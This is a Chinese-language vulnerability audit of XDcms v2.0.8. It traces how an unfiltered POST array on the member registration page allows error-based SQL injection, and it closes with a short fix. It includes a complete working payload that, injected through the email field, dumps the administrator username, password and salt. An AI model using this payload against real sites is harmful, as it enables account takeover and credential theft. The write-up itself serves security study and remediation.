這裡主要講v2.0.8版本的XDcms中的一個基於錯誤的SQL注入漏洞，較v2.0.7版本而言修復了很多注入漏洞，使得注入漏洞大為減少。

至於CMS的下載配置等就不說了，直接審計吧~

先整體看，點選index.php，先判斷是否存在檔案config.inc.php，若不存在則重定向去安裝；然後就是通過require()函式包含/system/common.inc.php檔案：

檢視/system/common.inc.php檔案，看到很多都是定義變數，期間都有包含一些檔案，每個檔案都點選進去檢視一下，其中最值得關注的就是最後的fun.inc.php：

檢視該檔案發現先包含了幾個檔案然後就是定義各個函式，其中一個global.inc.php檔案顯得比較重要，因為涉及到全域性變數的東西：

進入global.inc.php檔案中檢視，有發現對接收的引數進行過濾的操作：

看到其中有兩個對輸入引數進行過濾的函式，進行檢視，知道該函式的定義是在fun.inc.php中：

該過濾作用很強，幾乎繞過不了，但是可以發現的就是呼叫該函式進行過濾時只是對GET方法進行過濾，在這裡沒有對POST等方法進行過濾，接著搜尋一下關於$_POST的內容看看，其中POST很多都進行了過濾，但是有的會遺漏，其中有檔案是涉及到SQL的delete語句便利用不到了，找到其中的一個檔案\system\modules\member\index.php：

注意到$fields這個變數沒有被過濾且是一個數組，因為該頁面是註冊頁面的主頁，所以通過註冊一個使用者的資訊並用火狐的Live HTTP headers外掛來進行抓包：

POST傳送的內容為：username=aaaaaa&password=123456&password2=123456&fields%5Btruename%5D=aaaaaa&fields%5Bemail%5D=aaaaaa&submit=+%D7%A2+%B2%E1+

對field_sql變數呼叫var_dump()函式詳細地顯示出來，同時新增exit不讓後面的程式碼執行，重新註冊新賬號：

可以看到field_sql陣列變數的值為使用者輸入的field陣列中truename和email的值，接著改為輸出下一條語句：

該語句為：update c_member set `truename`='ccccca',`email`='ccccca' where userid=7

這裡可以嘗試進行注入，先搜尋並檢視一下query()函式的定義：

可以看到會輸出錯誤資訊，那麼現在就把之前新增的程式碼去掉並註冊email中含單引號的使用者看看：

可以看到，顯示錯誤資訊。在這裡就可以利用基於錯誤的構造語句來顯示系統的資訊：

(select 1 from(select count(*),concat(char(32,58,32),(select concat_ws(char(32,58,32),username,password,encrypt) from c_admin limit 0,1),char(32,58,32),floor(rand()*2))name from information_schema.tables group by name)b) #

放到phpmyadmin中去執行：

雖然報出多處錯誤，但是結果卻出來了。下面將語句補充完整再測試一下：

update c_member set `truename`='ccscca',`email`='ccscca' where userid=1 and (select 1 from(select count(*),concat(char(32,58,32),(select concat_ws(char(32,58,32),username,password,encrypt) from c_admin limit 0,1),char(32,58,32),floor(rand()*2))name from information_schema.tables group by name)b) #

最後直接將語句新增到email中執行即可：

可見，管理員使用者名稱和密碼都顯示出來了。

如果還有其他賬號密碼等資訊，通過該limit的第一個引數逐一遍歷出來即可。

防禦方法：

該漏洞產生的原因在於沒有對所有的POST提交過來的內容即$fields變數進行過濾從而導致漏洞的存在，直接通過呼叫safe_html()函式來過濾field_sql變數即可：